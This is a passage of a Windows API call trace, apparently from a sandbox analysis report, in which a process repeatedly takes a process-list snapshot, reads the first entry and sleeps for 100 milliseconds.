lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.167] Sleep (dwMilliseconds=0x64) [0295.172] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0295.187] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.249] Sleep (dwMilliseconds=0x64) [0295.253] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0295.268] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.341] Sleep (dwMilliseconds=0x64) [0295.345] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0295.355] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.415] Sleep (dwMilliseconds=0x64) [0295.418] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0295.433] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.518] Sleep (dwMilliseconds=0x64) [0295.520] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0295.532] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.625] Sleep (dwMilliseconds=0x64) [0295.627] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0295.643] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.713] Sleep (dwMilliseconds=0x64) [0295.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0295.732] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.815] Sleep (dwMilliseconds=0x64) [0295.823] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0295.837] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.913] Sleep (dwMilliseconds=0x64) [0295.918] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0295.931] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.107] Sleep (dwMilliseconds=0x64) [0296.110] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0296.126] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.202] Sleep (dwMilliseconds=0x64) [0296.208] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0296.227] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.318] Sleep (dwMilliseconds=0x64) [0296.322] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0296.337] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.419] Sleep (dwMilliseconds=0x64) [0296.438] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0296.451] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.524] Sleep (dwMilliseconds=0x64) [0296.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0296.543] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.646] Sleep (dwMilliseconds=0x64) [0296.649] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0296.661] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.719] Sleep (dwMilliseconds=0x64) [0296.722] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0296.734] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.917] Sleep (dwMilliseconds=0x64) [0296.955] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0296.965] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.059] Sleep (dwMilliseconds=0x64) [0297.062] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0297.074] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.129] Sleep (dwMilliseconds=0x64) [0297.131] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0297.145] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.240] Sleep (dwMilliseconds=0x64) [0297.241] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0297.253] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.327] Sleep (dwMilliseconds=0x64) [0297.329] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0297.340] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.397] Sleep (dwMilliseconds=0x64) [0297.402] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0297.416] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.480] Sleep (dwMilliseconds=0x64) [0297.486] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0297.500] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.585] Sleep (dwMilliseconds=0x64) [0297.589] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0297.599] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.652] Sleep (dwMilliseconds=0x64) [0297.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0297.665] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.719] Sleep (dwMilliseconds=0x64) [0297.722] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0297.732] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.818] Sleep (dwMilliseconds=0x64) [0297.821] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0297.836] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.906] Sleep (dwMilliseconds=0x64) [0297.909] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0297.923] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.999] Sleep (dwMilliseconds=0x64) [0298.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0298.013] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.071] Sleep (dwMilliseconds=0x64) [0298.073] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0298.084] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.147] Sleep (dwMilliseconds=0x64) [0298.149] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0298.160] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.219] Sleep (dwMilliseconds=0x64) [0298.223] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0298.233] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.303] Sleep (dwMilliseconds=0x64) [0298.320] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0298.334] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.457] Sleep (dwMilliseconds=0x64) [0298.479] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0298.518] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.614] Sleep (dwMilliseconds=0x64) [0298.616] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0298.625] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.679] Sleep (dwMilliseconds=0x64) [0298.680] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0298.693] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.743] Sleep (dwMilliseconds=0x64) [0298.746] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0298.764] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.824] Sleep (dwMilliseconds=0x64) [0298.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0298.841] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.897] Sleep (dwMilliseconds=0x64) [0298.898] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0298.909] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.976] Sleep (dwMilliseconds=0x64) [0298.979] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0298.990] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.055] Sleep (dwMilliseconds=0x64) [0299.057] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0299.070] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.138] Sleep (dwMilliseconds=0x64) [0299.143] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0299.158] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.233] Sleep (dwMilliseconds=0x64) [0299.237] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0299.251] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.332] Sleep (dwMilliseconds=0x64) [0299.335] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0299.352] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.419] Sleep (dwMilliseconds=0x64) [0299.420] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0299.433] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.484] Sleep (dwMilliseconds=0x64) [0299.486] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0299.496] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.569] Sleep (dwMilliseconds=0x64) [0299.570] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0299.580] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.631] Sleep (dwMilliseconds=0x64) [0299.637] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0299.653] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.703] Sleep (dwMilliseconds=0x64) [0299.705] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0299.715] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.796] Sleep (dwMilliseconds=0x64) [0299.799] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0299.809] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.888] Sleep (dwMilliseconds=0x64) [0299.891] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0299.903] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.964] Sleep (dwMilliseconds=0x64) [0299.968] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0299.982] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.038] Sleep (dwMilliseconds=0x64) [0300.040] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0300.052] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.109] Sleep (dwMilliseconds=0x64) [0300.112] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0300.130] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.192] Sleep (dwMilliseconds=0x64) [0300.196] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0300.211] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.282] Sleep (dwMilliseconds=0x64) [0300.287] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0300.315] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.399] Sleep (dwMilliseconds=0x64) [0300.402] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0300.416] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.488] Sleep (dwMilliseconds=0x64) [0300.515] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0300.538] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.632] Sleep (dwMilliseconds=0x64) [0300.634] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0300.649] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.723] Sleep (dwMilliseconds=0x64) [0300.727] CreateToolhelp32Snapshot (dwFlags=0x2, 